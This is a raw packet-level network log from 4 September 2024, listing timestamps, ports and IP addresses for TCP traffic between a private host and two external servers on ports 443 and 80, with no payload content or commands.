Sep 4, 2024 17:37:09.633650064 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.633677959 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.633904934 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.633919954 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.633968115 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.633976936 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.634015083 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.634321928 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.634336948 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.634373903 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.634381056 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.634402990 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.634423018 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.635973930 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.635987043 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.636030912 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.636039019 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.636074066 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.636275053 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.636290073 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.636326075 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.636332035 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.636348963 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.636373043 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.637595892 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.637609959 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.637653112 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.637658119 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.637687922 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.647754908 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.647768974 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.647810936 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.647819042 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.647854090 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.648567915 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.648581982 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.648617983 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.648622990 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.648638964 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.648658991 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.648772955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.648783922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.648792982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.648812056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.648816109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.648823023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.648838043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.648840904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.648849964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.648859978 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.648860931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.648868084 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.648873091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.648883104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.648890972 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.648905993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.648924112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.648947001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.648983002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649090052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649101973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649110079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649118900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649128914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649131060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649138927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649148941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649148941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649159908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649169922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649171114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649180889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649182081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649192095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649194002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649203062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649214029 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649235010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649241924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649451017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649461985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649470091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649480104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649490118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649493933 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649501085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649509907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649513960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649519920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649532080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649542093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649542093 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649552107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649560928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649568081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649571896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649576902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649584055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649594069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649600983 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649604082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649615049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649616003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649626017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649636030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649641037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649645090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649656057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649662971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649667978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.649671078 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649694920 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.649713993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650149107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650160074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650168896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650180101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650188923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650197983 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650199890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650204897 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650212049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650223017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650232077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650233030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650243998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650249004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650255919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650266886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650274992 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650288105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650295973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650300026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650310993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650311947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650324106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650335073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650341034 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650351048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650363922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650365114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650373936 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650377035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650388956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650398970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650399923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650410891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650420904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650430918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650432110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650439024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650443077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650454044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650454044 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650465965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650475979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650480986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650486946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650497913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650507927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650509119 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650520086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650520086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650533915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.650543928 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650557995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.650583029 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651065111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651077032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651084900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651096106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651107073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651110888 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651118994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651129961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651132107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651141882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651145935 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651159048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651164055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651170969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651181936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651185989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651201010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651201963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651215076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651225090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651226044 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651236057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651246071 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651247025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651264906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651274920 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651277065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651289940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651289940 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651302099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651309013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651314020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651316881 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651325941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651335955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651339054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651348114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651360989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651362896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651371002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651376009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651385069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651395082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651400089 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651406050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651417017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651422024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651427031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651437998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651438951 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651449919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651458979 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651472092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651504040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651859999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651870966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651880980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.651906967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.651917934 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.703847885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.703881979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.703893900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.703902006 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.703913927 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.703927040 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.703972101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.703983068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.703995943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704003096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.704006910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704016924 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.704035997 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.704062939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704099894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.704168081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704178095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704185963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704195976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704205990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704207897 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.704216003 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.704216957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704230070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704237938 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.704240084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704252958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.704276085 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.704350948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704363108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704371929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704380989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.704387903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.704406023 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.715846062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.715863943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.715874910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.715909958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.715938091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.715971947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.715982914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.715991020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716005087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716010094 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716017962 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716033936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716042995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716104984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716120005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716133118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716140985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716142893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716155052 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716161013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716166019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716171980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716178894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716182947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716203928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716222048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716257095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716291904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716293097 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716304064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716336012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716336012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716342926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716347933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716356993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716381073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716396093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716507912 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716519117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716527939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716542006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716551065 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716552019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716563940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716573000 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716592073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716603041 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716645002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716655970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716665030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716672897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716676950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716682911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716686010 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716698885 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716722965 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716767073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716778040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716787100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716795921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716804981 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716811895 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716815948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716825962 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716840029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.716851950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716860056 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.716876030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717045069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717055082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717063904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717073917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717082977 CEST	80	49717	147.45.44.104	192.168.2.6
